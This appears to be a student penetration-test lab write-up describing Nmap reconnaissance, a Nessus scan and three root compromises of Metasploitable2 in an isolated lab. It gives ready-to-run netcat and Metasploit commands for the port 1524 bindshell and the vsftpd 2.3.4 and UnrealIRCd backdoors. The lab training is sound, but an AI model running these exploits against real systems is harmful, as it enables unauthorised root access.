Share
## https://sploitus.com/exploit?id=344AF37C-35F5-5A70-83E4-B89507233DC0
# Project 7 โ Nessus Vulnerability Assessment + Metasploit Exploitation
## Objective
Conduct a full penetration test against Metasploitable2 using professional tools and methodology โ Nessus for vulnerability assessment, Metasploit for exploitation, and documented findings in a formal pentest report.
---
## Lab Environment
| Component | Details |
|---|---|
| Attacker | Kali Linux 2026.1 โ 192.168.56.102 |
| Target | Metasploitable2 โ 192.168.56.101 |
| Network | VirtualBox Host-Only (isolated, no internet exposure) |
| Scanner | Nessus Essentials 10.12.0 |
| Exploit Framework | Metasploit 6.4.116 |
---
## Methodology
```
Reconnaissance โ Nmap service scan
โ
Vulnerability Assessment โ Nessus scan (69 findings, 10 Critical)
โ
Manual CVE Research โ vsftpd, UnrealIRCd, Bindshell
โ
Exploitation โ Metasploit + netcat
โ
Post-Exploitation โ Root access confirmed ร 3
โ
Reporting โ Professional pentest report
```
---
## Reconnaissance Results
**Command:** `nmap -sV 192.168.56.101`
23 open ports identified including:
- 21/tcp โ vsftpd 2.3.4 (CVE-2011-2523 backdoor)
- 22/tcp โ OpenSSH 4.7p1
- 23/tcp โ Telnet (cleartext)
- 80/tcp โ Apache 2.2.8
- 1524/tcp โ Bindshell (open root shell)
- 5900/tcp โ VNC (password: "password")
- 6667/tcp โ UnrealIRCd (CVE-2010-2075 backdoor)
---
## Nessus Scan Results
| Severity | Count |
|---|---|
| Critical | 10 |
| High | 6 |
| Medium | 24 |
| Low | 9 |
| Info | 140 |
| **Total** | **69** |
Scan duration: 18 minutes
---
## Exploits Executed
### 1. Bind Shell Backdoor โ Port 1524
```bash
nc 192.168.56.101 1524
whoami # โ root
```
No credentials. No exploit. Just connect.
### 2. vsftpd 2.3.4 Backdoor โ CVE-2011-2523
```
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.56.101
set LHOST 192.168.56.102
run
# โ Meterpreter session opened as root
```
### 3. UnrealIRCd Backdoor โ CVE-2010-2075
```
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS 192.168.56.101
set LHOST 192.168.56.102
run
# โ root shell, uid=0(root) gid=0(root)
```
---
## Results
All 3 exploits achieved **root access** with no credentials required.
| Exploit | CVE | Result |
|---|---|---|
| Bind Shell (port 1524) | โ | Root shell via netcat |
| vsftpd 2.3.4 | CVE-2011-2523 | Meterpreter root session |
| UnrealIRCd 3.2.8.1 | CVE-2010-2075 | Meterpreter root session |
---
## Full Report
See [report/pentest_report.md](report/pentest_report.md) for complete findings, CVSS scores, and remediation recommendations.
---
## Key Learnings
- Manual CVE research before running tools โ identified vsftpd and UnrealIRCd backdoors from version numbers alone
- Nessus confirmed manual findings and added 60+ additional findings
- Port 1524 (bindshell) was visible in Nmap as "Metasploitable root shell" โ version detection is critical
- Three root shells via three different vectors โ real attacker needs only one
- Supply chain attacks (vsftpd, UnrealIRCd) are more dangerous than misconfigurations โ backdoors in legitimate software
## Skills Demonstrated
- Nmap reconnaissance and service fingerprinting
- Nessus vulnerability scanning and report analysis
- CVE research and manual vulnerability identification
- Metasploit framework โ search, configure, exploit
- Meterpreter post-exploitation
- CVSS scoring and risk prioritisation
- Professional pentest report writing